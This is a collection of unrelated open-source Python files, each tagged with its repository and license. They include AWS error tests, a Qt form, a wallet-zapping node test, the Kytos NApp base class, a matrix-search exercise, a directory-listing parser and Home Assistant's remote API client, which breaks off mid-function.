def assert_review_comments_created(call_args, errors, sha):
"""
Check that the review comments match the error list.
"""
eq_(len(call_args), len(errors), 'Errors and comment counts are off')
for i, err in enumerate(errors):
expected = call(
commit_id=sha,
path=err[0],
position=err[1],
body=err[2])
eq_(expected, call_args[i])
|
zoidbergwill/lint-review
|
tests/test_review.py
|
Python
|
mit
| 15,108
|
# Copyright (c) 2009 Canonical Ltd <duncan.mcgreggor@canonical.com>
# Licenced under the txaws licence available at /LICENSE in the txaws source.
from twisted.trial.unittest import TestCase
from txaws.exception import AWSError
from txaws.exception import AWSResponseParseError
from txaws.util import XML
REQUEST_ID = "0ef9fc37-6230-4d81-b2e6-1b36277d4247"
class AWSErrorTestCase(TestCase):
def test_creation(self):
error = AWSError("<dummy1 />", 500, "Server Error", "<dummy2 />")
self.assertEquals(error.status, 500)
self.assertEquals(error.response, "<dummy2 />")
self.assertEquals(error.original, "<dummy1 />")
self.assertEquals(error.errors, [])
self.assertEquals(error.request_id, "")
def test_node_to_dict(self):
xml = "<parent><child1>text1</child1><child2>text2</child2></parent>"
error = AWSError("<dummy />", 400)
data = error._node_to_dict(XML(xml))
self.assertEquals(data, {"child1": "text1", "child2": "text2"})
def test_set_request_id(self):
xml = "<a><b /><RequestID>%s</RequestID></a>" % REQUEST_ID
error = AWSError("<dummy />", 400)
error._set_request_id(XML(xml))
self.assertEquals(error.request_id, REQUEST_ID)
def test_set_host_id(self):
host_id = "ASD@#FDG$E%FG"
xml = "<a><b /><HostID>%s</HostID></a>" % host_id
error = AWSError("<dummy />", 400)
error._set_host_id(XML(xml))
self.assertEquals(error.host_id, host_id)
def test_set_empty_errors(self):
xml = "<a><Errors /><b /></a>"
error = AWSError("<dummy />", 500)
error._set_500_error(XML(xml))
self.assertEquals(error.errors, [])
def test_set_empty_error(self):
xml = "<a><Errors><Error /><Error /></Errors><b /></a>"
error = AWSError("<dummy />", 500)
error._set_500_error(XML(xml))
self.assertEquals(error.errors, [])
def test_parse_without_xml(self):
xml = "<dummy />"
error = AWSError(xml, 400)
error.parse()
self.assertEquals(error.original, xml)
def test_parse_with_xml(self):
xml1 = "<dummy1 />"
xml2 = "<dummy2 />"
error = AWSError(xml1, 400)
error.parse(xml2)
self.assertEquals(error.original, xml2)
def test_parse_html(self):
xml = "<html><body>a page</body></html>"
self.assertRaises(AWSResponseParseError, AWSError, xml, 400)
def test_empty_xml(self):
self.assertRaises(ValueError, AWSError, "", 400)
def test_no_request_id(self):
errors = "<Errors><Error><Code /><Message /></Error></Errors>"
xml = "<Response>%s<RequestID /></Response>" % errors
error = AWSError(xml, 400)
self.assertEquals(error.request_id, "")
def test_no_request_id_node(self):
errors = "<Errors><Error><Code /><Message /></Error></Errors>"
xml = "<Response>%s</Response>" % errors
error = AWSError(xml, 400)
self.assertEquals(error.request_id, "")
def test_no_errors_node(self):
xml = "<Response><RequestID /></Response>"
error = AWSError(xml, 400)
self.assertEquals(error.errors, [])
def test_no_error_node(self):
xml = "<Response><Errors /><RequestID /></Response>"
error = AWSError(xml, 400)
self.assertEquals(error.errors, [])
def test_no_error_code_node(self):
errors = "<Errors><Error><Message /></Error></Errors>"
xml = "<Response>%s<RequestID /></Response>" % errors
error = AWSError(xml, 400)
self.assertEquals(error.errors, [])
def test_no_error_message_node(self):
errors = "<Errors><Error><Code /></Error></Errors>"
xml = "<Response>%s<RequestID /></Response>" % errors
error = AWSError(xml, 400)
self.assertEquals(error.errors, [])
def test_set_500_error(self):
xml = "<Error><Code>500</Code><Message>Oops</Message></Error>"
error = AWSError("<dummy />", 500)
error._set_500_error(XML(xml))
self.assertEquals(error.errors[0]["Code"], "500")
self.assertEquals(error.errors[0]["Message"], "Oops")
|
lud4ik/txAWS
|
txaws/tests/test_exception.py
|
Python
|
mit
| 4,188
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file './flowchart/FlowchartTemplate.ui'
#
# Created: Sun Feb 24 19:47:30 2013
# by: pyside-uic 0.2.13 running on PySide 1.1.1
#
# WARNING! All changes made in this file will be lost!
from PySide import QtCore, QtGui
class Ui_Form(object):
def setupUi(self, Form):
Form.setObjectName("Form")
Form.resize(529, 329)
self.selInfoWidget = QtGui.QWidget(Form)
self.selInfoWidget.setGeometry(QtCore.QRect(260, 10, 264, 222))
self.selInfoWidget.setObjectName("selInfoWidget")
self.gridLayout = QtGui.QGridLayout(self.selInfoWidget)
self.gridLayout.setContentsMargins(0, 0, 0, 0)
self.gridLayout.setObjectName("gridLayout")
self.selDescLabel = QtGui.QLabel(self.selInfoWidget)
self.selDescLabel.setText("")
self.selDescLabel.setAlignment(QtCore.Qt.AlignLeading|QtCore.Qt.AlignLeft|QtCore.Qt.AlignTop)
self.selDescLabel.setWordWrap(True)
self.selDescLabel.setObjectName("selDescLabel")
self.gridLayout.addWidget(self.selDescLabel, 0, 0, 1, 1)
self.selNameLabel = QtGui.QLabel(self.selInfoWidget)
font = QtGui.QFont()
font.setWeight(75)
font.setBold(True)
self.selNameLabel.setFont(font)
self.selNameLabel.setText("")
self.selNameLabel.setObjectName("selNameLabel")
self.gridLayout.addWidget(self.selNameLabel, 0, 1, 1, 1)
self.selectedTree = DataTreeWidget(self.selInfoWidget)
self.selectedTree.setObjectName("selectedTree")
self.selectedTree.headerItem().setText(0, "1")
self.gridLayout.addWidget(self.selectedTree, 1, 0, 1, 2)
self.hoverText = QtGui.QTextEdit(Form)
self.hoverText.setGeometry(QtCore.QRect(0, 240, 521, 81))
self.hoverText.setObjectName("hoverText")
self.view = FlowchartGraphicsView(Form)
self.view.setGeometry(QtCore.QRect(0, 0, 256, 192))
self.view.setObjectName("view")
self.retranslateUi(Form)
QtCore.QMetaObject.connectSlotsByName(Form)
def retranslateUi(self, Form):
Form.setWindowTitle(QtGui.QApplication.translate("Form", "Form", None, QtGui.QApplication.UnicodeUTF8))
from pyqtgraph.widgets.DataTreeWidget import DataTreeWidget
from pyqtgraph.flowchart.FlowchartGraphicsView import FlowchartGraphicsView
|
ibressler/pyqtgraph
|
pyqtgraph/flowchart/FlowchartTemplate_pyside.py
|
Python
|
mit
| 2,393
|
#!/usr/bin/env python3
# Copyright (c) 2014-2016 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test the zapwallettxes functionality.
- start two iopd nodes
- create two transactions on node 0 - one is confirmed and one is unconfirmed.
- restart node 0 and verify that both the confirmed and the unconfirmed
transactions are still available.
- restart node 0 with zapwallettxes and persistmempool, and verify that both
the confirmed and the unconfirmed transactions are still available.
- restart node 0 with just zapwallettxed and verify that the confirmed
transactions are still available, but that the unconfirmed transaction has
been zapped.
"""
from test_framework.test_framework import IoPTestFramework
from test_framework.util import (
assert_equal,
assert_raises_rpc_error,
wait_until,
)
class ZapWalletTXesTest (IoPTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 2
def run_test(self):
self.log.info("Mining blocks...")
self.nodes[0].generate(1)
self.sync_all()
self.nodes[1].generate(100)
self.sync_all()
# This transaction will be confirmed
txid1 = self.nodes[0].sendtoaddress(self.nodes[1].getnewaddress(), 10)
self.nodes[0].generate(1)
self.sync_all()
# This transaction will not be confirmed
txid2 = self.nodes[0].sendtoaddress(self.nodes[1].getnewaddress(), 20)
# Confirmed and unconfirmed transactions are now in the wallet.
assert_equal(self.nodes[0].gettransaction(txid1)['txid'], txid1)
assert_equal(self.nodes[0].gettransaction(txid2)['txid'], txid2)
# Stop-start node0. Both confirmed and unconfirmed transactions remain in the wallet.
self.stop_node(0)
self.start_node(0)
assert_equal(self.nodes[0].gettransaction(txid1)['txid'], txid1)
assert_equal(self.nodes[0].gettransaction(txid2)['txid'], txid2)
# Stop node0 and restart with zapwallettxes and persistmempool. The unconfirmed
# transaction is zapped from the wallet, but is re-added when the mempool is reloaded.
self.stop_node(0)
self.start_node(0, ["-persistmempool=1", "-zapwallettxes=2"])
wait_until(lambda: self.nodes[0].getmempoolinfo()['size'] == 1, timeout=3)
assert_equal(self.nodes[0].gettransaction(txid1)['txid'], txid1)
assert_equal(self.nodes[0].gettransaction(txid2)['txid'], txid2)
# Stop node0 and restart with zapwallettxes, but not persistmempool.
# The unconfirmed transaction is zapped and is no longer in the wallet.
self.stop_node(0)
self.start_node(0, ["-zapwallettxes=2"])
# tx1 is still be available because it was confirmed
assert_equal(self.nodes[0].gettransaction(txid1)['txid'], txid1)
# This will raise an exception because the unconfirmed transaction has been zapped
assert_raises_rpc_error(-5, 'Invalid or non-wallet transaction id', self.nodes[0].gettransaction, txid2)
if __name__ == '__main__':
ZapWalletTXesTest().main()
|
Anfauglith/iop-hd
|
test/functional/zapwallettxes.py
|
Python
|
mit
| 3,234
|
"""Kytos Napps Module."""
import json
import os
import re
import sys
import tarfile
import urllib
from abc import ABCMeta, abstractmethod
from pathlib import Path
from random import randint
from threading import Event, Thread
from kytos.core.events import KytosEvent
from kytos.core.logs import NAppLog
__all__ = ('KytosNApp',)
LOG = NAppLog()
class NApp:
"""Class to represent a NApp."""
# pylint: disable=too-many-arguments
def __init__(self, username=None, name=None, version=None,
repository=None, meta=False):
self.username = username
self.name = name
self.version = version if version else 'latest'
self.repository = repository
self.meta = meta
self.description = None
self.tags = []
self.enabled = False
self.napp_dependencies = []
def __str__(self):
return "{}/{}".format(self.username, self.name)
def __repr__(self):
return f"NApp({self.username}/{self.name})"
def __hash__(self):
return hash(self.id)
def __eq__(self, other):
"""Compare username/name strings."""
return isinstance(other, self.__class__) and self.id == other.id
@property
def id(self): # pylint: disable=invalid-name
"""username/name string."""
return str(self)
@property
def uri(self):
"""Return a unique identifier of this NApp."""
version = self.version if self.version else 'latest'
if not self._has_valid_repository():
return ""
# Use the next line after Diraol fix redirect using ":" for version
# return "{}/{}:{}".format(self.repository, self.id, version)
return "{}/{}-{}".format(self.repository, self.id, version)
@property
def package_url(self):
"""Return a fully qualified URL for a NApp package."""
if not self.uri:
return ""
return "{}.napp".format(self.uri)
@classmethod
def create_from_uri(cls, uri):
"""Return a new NApp instance from an unique identifier."""
regex = r'^(((https?://|file://)(.+))/)?(.+?)/(.+?)/?(:(.+))?$'
match = re.match(regex, uri)
if not match:
return None
return cls(username=match.groups()[4],
name=match.groups()[5],
version=match.groups()[7],
repository=match.groups()[1])
@classmethod
def create_from_json(cls, filename):
"""Return a new NApp instance from a metadata file."""
with open(filename, encoding='utf-8') as data_file:
data = json.loads(data_file.read())
return cls.create_from_dict(data)
@classmethod
def create_from_dict(cls, data):
"""Return a new NApp instance from metadata."""
napp = cls()
for attribute, value in data.items():
setattr(napp, attribute, value)
return napp
def as_json(self):
"""Dump all NApp attributes on a json format."""
return json.dumps(self.__dict__)
def match(self, pattern):
"""Whether a pattern is present on NApp id, description and tags."""
try:
pattern = '.*{}.*'.format(pattern)
pattern = re.compile(pattern, re.IGNORECASE)
strings = [self.id, self.description] + self.tags
return any(pattern.match(string) for string in strings)
except TypeError:
return False
def download(self):
"""Download NApp package from his repository.
Raises:
urllib.error.HTTPError: If download is not successful.
Returns:
str: Downloaded temp filename.
"""
if not self.package_url:
return None
package_filename = urllib.request.urlretrieve(self.package_url)[0]
extracted = self._extract(package_filename)
Path(package_filename).unlink()
self._update_repo_file(extracted)
return extracted
@staticmethod
def _extract(filename):
"""Extract NApp package to a temporary folder.
Return:
pathlib.Path: Temp dir with package contents.
"""
random_string = '{:0d}'.format(randint(0, 10**6))
tmp = '/tmp/kytos-napp-' + Path(filename).stem + '-' + random_string
os.mkdir(tmp)
with tarfile.open(filename, 'r:xz') as tar:
tar.extractall(tmp)
return Path(tmp)
def _has_valid_repository(self):
"""Whether this NApp has a valid repository or not."""
return all([self.username, self.name, self.repository])
def _update_repo_file(self, destination=None):
"""Create or update the file '.repo' inside NApp package."""
with open("{}/.repo".format(destination), 'w') as repo_file:
repo_file.write(self.repository + '\n')
class KytosNApp(Thread, metaclass=ABCMeta):
"""Base class for any KytosNApp to be developed."""
def __init__(self, controller, **kwargs):
"""Contructor of KytosNapps.
Go through all of the instance methods and selects those that have
the events attribute, then creates a dict containing the event_name
and the list of methods that are responsible for handling such event.
At the end, the setup method is called as a complement of the init
process.
"""
Thread.__init__(self, daemon=False)
self.controller = controller
self.username = None # loaded from json
self.name = None # loaded from json
self.meta = False # loaded from json
self._load_json()
# Force a listener with a private method.
self._listeners = {
'kytos/core.shutdown': [self._shutdown_handler],
'kytos/core.shutdown.' + self.napp_id: [self._shutdown_handler]}
self.__event = Event()
#: int: Seconds to sleep before next call to :meth:`execute`. If
#: negative, run :meth:`execute` only once.
self.__interval = -1
self.setup()
#: Add non-private methods that listen to events.
handler_methods = [getattr(self, method_name) for method_name in
dir(self) if method_name[0] != '_' and
callable(getattr(self, method_name)) and
hasattr(getattr(self, method_name), 'events')]
# Building the listeners dictionary
for method in handler_methods:
for event_name in method.events:
if event_name not in self._listeners:
self._listeners[event_name] = []
self._listeners[event_name].append(method)
@property
def napp_id(self):
"""username/name string."""
return "{}/{}".format(self.username, self.name)
def listeners(self):
"""Return all listeners registered."""
return list(self._listeners.keys())
def _load_json(self):
"""Update object attributes based on kytos.json."""
current_file = sys.modules[self.__class__.__module__].__file__
json_path = os.path.join(os.path.dirname(current_file), 'kytos.json')
with open(json_path, encoding='utf-8') as data_file:
data = json.loads(data_file.read())
for attribute, value in data.items():
setattr(self, attribute, value)
def execute_as_loop(self, interval):
"""Run :meth:`execute` within a loop. Call this method during setup.
By calling this method, the application does not need to worry about
loop details such as sleeping and stopping the loop when
:meth:`shutdown` is called. Just call this method during :meth:`setup`
and implement :meth:`execute` as a single execution.
Args:
interval (int): Seconds between each call to :meth:`execute`.
"""
self.__interval = interval
def run(self):
"""Call the execute method, looping as needed.
It should not be overriden.
"""
self.notify_loaded()
LOG.info("Running NApp: %s", self)
self.execute()
while self.__interval > 0 and not self.__event.is_set():
self.__event.wait(self.__interval)
self.execute()
def notify_loaded(self):
"""Inform this NApp has been loaded."""
name = f'{self.username}/{self.name}.loaded'
event = KytosEvent(name=name, content={})
self.controller.buffers.app.put(event)
# all listeners receive event
def _shutdown_handler(self, event): # pylint: disable=unused-argument
"""Listen shutdown event from kytos.
This method listens the kytos/core.shutdown event and call the shutdown
method from napp subclass implementation.
Paramters
event (:class:`KytosEvent`): event to be listened.
"""
if not self.__event.is_set():
self.__event.set()
self.shutdown()
@abstractmethod
def setup(self):
"""Replace the 'init' method for the KytosApp subclass.
The setup method is automatically called on the NApp __init__().
Users aren't supposed to call this method directly.
"""
@abstractmethod
def execute(self):
"""Execute in a loop until 'kytos/core.shutdown' is received.
The execute method is called by KytosNApp class.
Users shouldn't call this method directly.
"""
@abstractmethod
def shutdown(self):
"""Run before the app is unloaded and the controller, stopped.
The user implementation of this method should do the necessary routine
for the user App and also it is a good moment to break the loop of the
execute method if it is in a loop.
This methods is not going to be called directly, it is going to be
called by the _shutdown_handler method when a KytosShutdownEvent is
sent.
"""
|
kytos/kytos
|
kytos/core/napps/base.py
|
Python
|
mit
| 9,959
|
#!/usr/bin/python3
import sqlite3, sys
# It takes one argument: the name of the new database
if (len(sys.argv) < 1):
sys.stderr.write('You need to give the name of the ILI DB\n')
sys.exit(1)
else:
dbfile = sys.argv[1]
################################################################
# CONNECT TO DB
################################################################
con = sqlite3.connect(dbfile)
c = con.cursor()
################################################################
# USER
################################################################
u = "ili_load-kinds.py"
################################################################
# INSERT POS DATA (CODES AND NAMES)
################################################################
c.execute("""INSERT INTO kind (id, kind, u)
VALUES (?,?,?)""", [1,'concept',u])
c.execute("""INSERT INTO kind (id, kind, u)
VALUES (?,?,?)""", [2,'instance',u])
con.commit()
con.close()
sys.stderr.write('Loaded KIND data in (%s)\n' % (dbfile))
|
globalwordnet/OMW
|
scripts/load-ili-kinds.py
|
Python
|
mit
| 1,029
|
"""kaxabu URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.9/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url, include
from django.contrib import admin
urlpatterns = [
url(r'^', include('族語辭典.網址')),
url(r'^admin/', admin.site.urls),
]
|
Taiwanese-Corpus/kaxabu-muwalak-misa-a-ahan-bizu
|
後端/kaxabu/urls.py
|
Python
|
mit
| 819
|
"""
Write an efficient algorithm that searches for a value in an m x n matrix. This matrix has the following properties:
Integers in each row are sorted from left to right.
The first integer of each row is greater than the last integer of the previous row.
For example,
Consider the following matrix:
[
[1, 3, 5, 7],
[10, 11, 16, 20],
[23, 30, 34, 50]
]
Given target = 3, return true.
"""
__author__ = 'Danyang'
class Solution:
def searchMatrix(self, matrix, target):
"""
binary search. Two exactly the same binary search algorithm
:param matrix: a list of lists of integers
:param target: an integer
:return: a boolean
"""
if not matrix:
return False
m = len(matrix)
n = len(matrix[0])
# binary search
start = 0
end = m # [0, m)
while start<end:
mid = (start+end)/2
if matrix[mid][0]==target:
return True
if target<matrix[mid][0]:
end = mid
elif target>matrix[mid][0]:
start = mid+1
lst = matrix[end] if matrix[end][0]<=target else matrix[start] # positioning !
# binary search
start = 0
end = n # [0, n)
while start<end:
mid = (start+end)/2
if lst[mid]==target:
return True
if target<lst[mid]:
end = mid
elif target>lst[mid]:
start = mid+1
return False
if __name__=="__main__":
assert Solution().searchMatrix([[1], [3]], 3)==True
|
dominjune/LeetCode
|
074 Search a 2D Matrix.py
|
Python
|
mit
| 1,679
|
from abc import ABCMeta, abstractmethod
from enum import Enum
class InputType(Enum):
ls = 1
dir = 2
unknown = 3
class ParserBase(metaclass=ABCMeta):
def __init__(self, input_text, extensions):
self.input = input_text.splitlines()
self.extensions = extensions
@abstractmethod
def read_directories(self):
pass
def _read_directories(self, num_word):
directory = ''
output = []
for line in self.input:
if len(line) == 0:
continue
elif line == '\n':
continue
elif self._check_if_directory(line):
directory = self._parse_directory(line)
else:
title = self._parse_line(line, num_word)
if self._check_extension(title):
output.append(directory + title)
return output
@abstractmethod
def _check_if_directory(self, line):
pass
@abstractmethod
def _parse_directory(self, line):
pass
@staticmethod
def _parse_line(line, num_word):
words = line.split(None, num_word - 1)
if len(words) < num_word:
return ''
else:
return words[num_word - 1]
def _check_extension(self, title):
if len(title) > 3 and title[-4] == '.':
for ext in self.extensions:
if title.endswith(ext):
return True
return False
class ParserLS(ParserBase):
def read_directories(self):
return self._read_directories(9)
def _check_if_directory(self, line):
return line.startswith(".")
def _parse_directory(self, line):
return line[0:-1] + '/'
class ParserDIR(ParserBase):
def __init__(self, input_text, extensions):
super(ParserDIR, self).__init__(input_text, extensions)
self.firstDir = ''
def read_directories(self):
self._set_first_dir()
return self._read_directories(4)
def _check_if_directory(self, line):
return line.startswith(" Katalog:")
def _parse_directory(self, line):
return self._parse_directory_zero(line).replace(self.firstDir, "./")
def _set_first_dir(self):
i = 0
for line in self.input:
i += 1
if i > 5:
self.firstDir = ''
return
elif self._check_if_directory(line):
self.firstDir = self._parse_directory_zero(line)
return
self.firstDir = ''
@staticmethod
def _parse_directory_zero(line):
return (line[10:] + '/').replace("\\", "/")
def recognize_file_type(input_text):
i = 0
for line in input_text.splitlines():
i += 1
if i > 5:
return InputType.unknown
elif line.startswith('total '):
return InputType.ls
elif 'Katalog:' in line:
return InputType.dir
return InputType.unknown
|
APMD/PMD
|
PMD/parser/parsers.py
|
Python
|
mit
| 2,980
|
"""
Support for an interface to work with a remote instance of Home Assistant.
If a connection error occurs while communicating with the API a
HomeAssistantError will be raised.
For more details about the Python API, please refer to the documentation at
https://home-assistant.io/developers/python_api/
"""
from datetime import datetime
import enum
import json
import logging
import threading
import urllib.parse
import requests
import homeassistant.bootstrap as bootstrap
import homeassistant.core as ha
from homeassistant.const import (
HTTP_HEADER_HA_AUTH, SERVER_PORT, URL_API, URL_API_EVENT_FORWARD,
URL_API_EVENTS, URL_API_EVENTS_EVENT, URL_API_SERVICES,
URL_API_SERVICES_SERVICE, URL_API_STATES, URL_API_STATES_ENTITY,
HTTP_HEADER_CONTENT_TYPE, CONTENT_TYPE_JSON)
from homeassistant.exceptions import HomeAssistantError
METHOD_GET = "get"
METHOD_POST = "post"
METHOD_DELETE = "delete"
_LOGGER = logging.getLogger(__name__)
class APIStatus(enum.Enum):
"""Represent API status."""
# pylint: disable=no-init,invalid-name,too-few-public-methods
OK = "ok"
INVALID_PASSWORD = "invalid_password"
CANNOT_CONNECT = "cannot_connect"
UNKNOWN = "unknown"
def __str__(self):
"""Return the state."""
return self.value
class API(object):
"""Object to pass around Home Assistant API location and credentials."""
# pylint: disable=too-few-public-methods
def __init__(self, host, api_password=None, port=None, use_ssl=False):
"""Initalize the API."""
self.host = host
self.port = port or SERVER_PORT
self.api_password = api_password
if use_ssl:
self.base_url = "https://{}:{}".format(host, self.port)
else:
self.base_url = "http://{}:{}".format(host, self.port)
self.status = None
self._headers = {
HTTP_HEADER_CONTENT_TYPE: CONTENT_TYPE_JSON,
}
if api_password is not None:
self._headers[HTTP_HEADER_HA_AUTH] = api_password
def validate_api(self, force_validate=False):
"""Test if we can communicate with the API."""
if self.status is None or force_validate:
self.status = validate_api(self)
return self.status == APIStatus.OK
def __call__(self, method, path, data=None):
"""Make a call to the Home Assistant API."""
if data is not None:
data = json.dumps(data, cls=JSONEncoder)
url = urllib.parse.urljoin(self.base_url, path)
try:
if method == METHOD_GET:
return requests.get(
url, params=data, timeout=5, headers=self._headers)
else:
return requests.request(
method, url, data=data, timeout=5, headers=self._headers)
except requests.exceptions.ConnectionError:
_LOGGER.exception("Error connecting to server")
raise HomeAssistantError("Error connecting to server")
except requests.exceptions.Timeout:
error = "Timeout when talking to {}".format(self.host)
_LOGGER.exception(error)
raise HomeAssistantError(error)
def __repr__(self):
"""Return the representation of the API."""
return "API({}, {}, {})".format(
self.host, self.api_password, self.port)
class HomeAssistant(ha.HomeAssistant):
"""Home Assistant that forwards work."""
# pylint: disable=super-init-not-called,too-many-instance-attributes
def __init__(self, remote_api, local_api=None):
"""Initalize the forward instance."""
if not remote_api.validate_api():
raise HomeAssistantError(
"Remote API at {}:{} not valid: {}".format(
remote_api.host, remote_api.port, remote_api.status))
self.remote_api = remote_api
self.pool = pool = ha.create_worker_pool()
self.bus = EventBus(remote_api, pool)
self.services = ha.ServiceRegistry(self.bus, pool)
self.states = StateMachine(self.bus, self.remote_api)
self.config = ha.Config()
self.config.api = local_api
def start(self):
"""Start the instance."""
# Ensure a local API exists to connect with remote
if 'api' not in self.config.components:
if not bootstrap.setup_component(self, 'api'):
raise HomeAssistantError(
'Unable to setup local API to receive events')
ha.create_timer(self)
self.bus.fire(ha.EVENT_HOMEASSISTANT_START,
origin=ha.EventOrigin.remote)
# Give eventlet time to startup
import eventlet
eventlet.sleep(0.1)
# Setup that events from remote_api get forwarded to local_api
# Do this after we fire START, otherwise HTTP is not started
if not connect_remote_events(self.remote_api, self.config.api):
raise HomeAssistantError((
'Could not setup event forwarding from api {} to '
'local api {}').format(self.remote_api, self.config.api))
def stop(self):
"""Stop Home Assistant and shuts down all threads."""
_LOGGER.info("Stopping")
self.bus.fire(ha.EVENT_HOMEASSISTANT_STOP,
origin=ha.EventOrigin.remote)
self.pool.stop()
# Disconnect master event forwarding
disconnect_remote_events(self.remote_api, self.config.api)
class EventBus(ha.EventBus):
"""EventBus implementation that forwards fire_event to remote API."""
# pylint: disable=too-few-public-methods
def __init__(self, api, pool=None):
"""Initalize the eventbus."""
super().__init__(pool)
self._api = api
def fire(self, event_type, event_data=None, origin=ha.EventOrigin.local):
"""Forward local events to remote target.
Handles remote event as usual.
"""
# All local events that are not TIME_CHANGED are forwarded to API
if origin == ha.EventOrigin.local and \
event_type != ha.EVENT_TIME_CHANGED:
fire_event(self._api, event_type, event_data)
else:
super().fire(event_type, event_data, origin)
class EventForwarder(object):
"""Listens for events and forwards to specified APIs."""
def __init__(self, hass, restrict_origin=None):
"""Initalize the event forwarder."""
self.hass = hass
self.restrict_origin = restrict_origin
# We use a tuple (host, port) as key to ensure
# that we do not forward to the same host twice
self._targets = {}
self._lock = threading.Lock()
def connect(self, api):
"""Attach to a Home Assistant instance and forward events.
Will overwrite old target if one exists with same host/port.
"""
with self._lock:
if len(self._targets) == 0:
# First target we get, setup listener for events
self.hass.bus.listen(ha.MATCH_ALL, self._event_listener)
key = (api.host, api.port)
self._targets[key] = api
def disconnect(self, api):
"""Remove target from being forwarded to."""
with self._lock:
key = (api.host, api.port)
did_remove = self._targets.pop(key, None) is None
if len(self._targets) == 0:
# Remove event listener if no forwarding targets present
self.hass.bus.remove_listener(ha.MATCH_ALL,
self._event_listener)
return did_remove
def _event_listener(self, event):
"""Listen and forward all events."""
with self._lock:
# We don't forward time events or, if enabled, non-local events
if event.event_type == ha.EVENT_TIME_CHANGED or \
(self.restrict_origin and event.origin != self.restrict_origin):
return
for api in self._targets.values():
fire_event(api, event.event_type, event.data)
class StateMachine(ha.StateMachine):
"""Fire set events to an API. Uses state_change events to track states."""
def __init__(self, bus, api):
"""Initalize the statemachine."""
super().__init__(None)
self._api = api
self.mirror()
bus.listen(ha.EVENT_STATE_CHANGED, self._state_changed_listener)
def remove(self, entity_id):
"""Remove the state of an entity.
Returns boolean to indicate if an entity was removed.
"""
return remove_state(self._api, entity_id)
def set(self, entity_id, new_state, attributes=None):
"""Call set_state on remote API."""
set_state(self._api, entity_id, new_state, attributes)
def mirror(self):
"""Discard current data and mirrors the remote state machine."""
self._states = {state.entity_id: state for state
in get_states(self._api)}
def _state_changed_listener(self, event):
"""Listen for state changed events and applies them."""
if event.data['new_state'] is None:
self._states.pop(event.data['entity_id'], None)
else:
self._states[event.data['entity_id']] = event.data['new_state']
class JSONEncoder(json.JSONEncoder):
"""JSONEncoder that supports Home Assistant objects."""
# pylint: disable=too-few-public-methods,method-hidden
def default(self, obj):
"""Convert Home Assistant objects.
Hand other objects to the original method.
"""
if isinstance(obj, datetime):
return obj.isoformat()
elif hasattr(obj, 'as_dict'):
return obj.as_dict()
try:
return json.JSONEncoder.default(self, obj)
except TypeError:
# If the JSON serializer couldn't serialize it
# it might be a generator, convert it to a list
try:
return [self.default(child_obj)
for child_obj in obj]
except TypeError:
# Ok, we're lost, cause the original error
return json.JSONEncoder.default(self, obj)
def validate_api(api):
"""Make a call to validate API."""
try:
req = api(METHOD_GET, URL_API)
if req.status_code == 200:
return APIStatus.OK
elif req.status_code == 401:
return APIStatus.INVALID_PASSWORD
else:
return APIStatus.UNKNOWN
except HomeAssistantError:
return APIStatus.CANNOT_CONNECT
def connect_remote_events(from_api, to_api):
"""Setup from_api to forward all events to to_api."""
data = {
'host': to_api.host,
'api_password': to_api.api_password,
'port': to_api.port
}
try:
req = from_api(METHOD_POST, URL_API_EVENT_FORWARD, data)
if req.status_code == 200:
return True
else:
_LOGGER.error(
"Error setting up event forwarding: %s - %s",
req.status_code, req.text)
return False
except HomeAssistantError:
_LOGGER.exception("Error setting up event forwarding")
return False
def disconnect_remote_events(from_api, to_api):
"""Disconnect forwarding events from from_api to to_api."""
data = {
'host': to_api.host,
'port': to_api.port
}
try:
req = from_api(METHOD_DELETE, URL_API_EVENT_FORWARD, data)
if req.status_code == 200:
return True
else:
_LOGGER.error(
"Error removing event forwarding: %s - %s",
req.status_code, req.text)
return False
except HomeAssistantError:
_LOGGER.exception("Error removing an event forwarder")
return False
def get_event_listeners(api):
"""List of events that is being listened for."""
try:
req = api(METHOD_GET, URL_API_EVENTS)
return req.json() if req.status_code == 200 else {}
except (HomeAssistantError, ValueError):
# ValueError if req.json() can't parse the json
_LOGGER.exception("Unexpected result retrieving event listeners")
return {}
def fire_event(api, event_type, data=None):
"""Fire an event at remote API."""
try:
req = api(METHOD_POST, URL_API_EVENTS_EVENT.format(event_type), data)
if req.status_code != 200:
_LOGGER.error("Error firing event: %d - %s",
req.status_code, req.text)
except HomeAssistantError:
_LOGGER.exception("Error firing event")
def get_state(api, entity_id):
"""Query given API for state of entity_id."""
try:
req = api(METHOD_GET, URL_API_STATES_ENTITY.format(entity_id))
# req.status_code == 422 if entity does not exist
return ha.State.from_dict(req.json()) \
if req.status_code == 200 else None
except (HomeAssistantError, ValueError):
# ValueError if req.json() can't parse the json
_LOGGER.exception("Error fetching state")
return None
def get_states(api):
"""Query given API for all states."""
try:
req = api(METHOD_GET,
URL_API_STATES)
return [ha.State.from_dict(item) for
item in req.json()]
except (HomeAssistantError, ValueError, AttributeError):
# ValueError if req.json() can't parse the json
_LOGGER.exception("Error fetching states")
return []
def remove_state(api, entity_id):
"""Call API to remove state for entity_id.
Return True if entity is gone (removed/never existed).
"""
try:
req = api(METHOD_DELETE, URL_API_STATES_ENTITY.format(entity_id))
if req.status_code in (200, 404):
return True
_LOGGER.error("Error removing state: %d - %s",
req.status_code, req.text)
return False
except HomeAssistantError:
_LOGGER.exception("Error removing state")
return False
def set_state(api, entity_id, new_state, attributes=None):
"""Tell API to update state for entity_id.
Return True if success.
"""
attributes = attributes or {}
data = {'state': new_state,
'attributes': attributes}
try:
req = api(METHOD_POST,
URL_API_STATES_ENTITY.format(entity_id),
data)
if req.status_code not in (200, 201):
_LOGGER.error("Error changing state: %d - %s",
req.status_code, req.text)
return False
else:
return True
except HomeAssistantError:
_LOGGER.exception("Error setting state")
return False
def is_state(api, entity_id, state):
"""Query API to see if entity_id is specified state."""
cur_state = get_state(api, entity_id)
return cur_state and cur_state.state == state
def get_services(api):
"""Return a list of dicts.
Each dict has a string "domain" and a list of strings "services".
"""
try:
